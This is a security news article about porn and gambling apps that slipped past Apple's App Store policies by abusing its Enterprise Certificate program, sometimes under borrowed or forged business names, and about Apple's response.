Apple’s easily abused Enterprise Certificate program isn’t just letting snoopy Facebook and Google apps slide into its App Store, it turns out: It’s also being exploited by, at the very least, a dozen hardcore porn apps and a dozen gambling apps.

Last week, Facebook’s Research app – that paid people, including teens, to install a Virtual Private Network (VPN) app that planted a root certificate on their phones and thereby got nearly limitless access to their devices – got booted out of Apple’s App Store. The Research app had managed to crawl into the App Store via Apple’s Enterprise Certificate program: a certificate granted with the understanding that installation of root certificates must only be used for “specific business purposes” and “only for use by your employees” …not by consumers whose data Facebook was sucking up.

Within hours, Google found itself apologizing for doing something similar.

Now, it’s apparent how easy it is to use that enterprise certificate to sneak apps past the content policies that Apple tries to enforce to keep the App Store wholesome – as in, stocked with well-behaved apps that don’t gobble up data and content that’s not pushing “explicit descriptions or displays of sexual organs or activities intended to stimulate erotic rather than aesthetic or emotional feelings.”

According to Tech Crunch, the developers behind the gambling and porn apps have either passed what it calls Apple’s “weak” Enterprise Certificate screening process or piggybacked onto a legitimate approval.

Apple was swift to react when Tech Crunch broke the news about Facebook’s and Google’s “clear breach” of its certificate policies. After briefly revoking the companies’ certificates (for all apps, including those that were, per Apple’s policy, used by employees), Apple has over the past few days gone on a bit of an app-disabling spree. Thus have some of the dozens of porn and gambling apps that Tech Crunch initially found in the App Store gone bye-bye.

As of Tuesday, still-functioning porn apps included Swag, PPAV, Banana Video, iPorn (iP), Pear, Poshow and AVBobo, and the gambling apps still available included RD Poker and RiverPoker. As of Wednesday, Banana Video, for one, was still hanging in there.

How ‘iPorn’ et al. tiptoes into the App Store

All developers have to do to get an enterprise certificate is to fill out an online form, fork over $299, hand over an easily found D-U-N-S business ID number (Apple provides a tool to look it up) and business address, and use an up-to-date Mac. Tech Crunch’s Josh Constine even found these step-by-step directions on how to get an Apple enterprise app developer license.

Then, the developers sit back and wait for a call from Apple. It takes one to four weeks. The last step: lie to the Apple rep about plans to only distribute the apps internally.

Often, part of the ruse is for these violative apps to hide behind company names that obscure their real purpose: for example, Tech Crunch found such business names as Interprener, Mohajer International Communications, Sungate and AsianLiveTech. Constine says that he also came across what appeared to be “forged or stolen credentials to sign up under the names of completely unrelated but legitimate businesses.” From his report:

Dragon Gaming was registered to U.S. gravel supplier CSL-LOMA. As for porn apps, PPAV’s certificate is assigned to the Nanjing Jianye District Information Center, Douyin Didi was licensed under Moscow motorcycle company Akura OOO, Chinese app Pear is registered to Grupo Arcavi Sociedad Anonima in Costa Rica and AVBobo covers its tracks with the name of a Fresno-based company called Chaney Cabinet Furniture Co.

Apple will send the apps – and maybe their devs – packing

Apple wouldn’t explain how these apps are getting past its vetting to get into the Enterprise Certificate app program. Nor would it discuss whether it will change how it deals with its enterprise program, including whether it will in the future follow up to see if apps that get in are, or remain, compliant, or if it plans to change its admission process. It did, though, give Tech Crunch a statement about its plans to shut down such apps and potentially to ban the developers from building iOS products:

Developers that abuse our enterprise certificates are in violation of the Apple Developer Enterprise Program Agreement and will have their certificates terminated, and if appropriate, they will be removed from our Developer Program completely. We are continuously evaluating the cases of misuse and are prepared to take immediate action.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Z3GuTqaP3dY/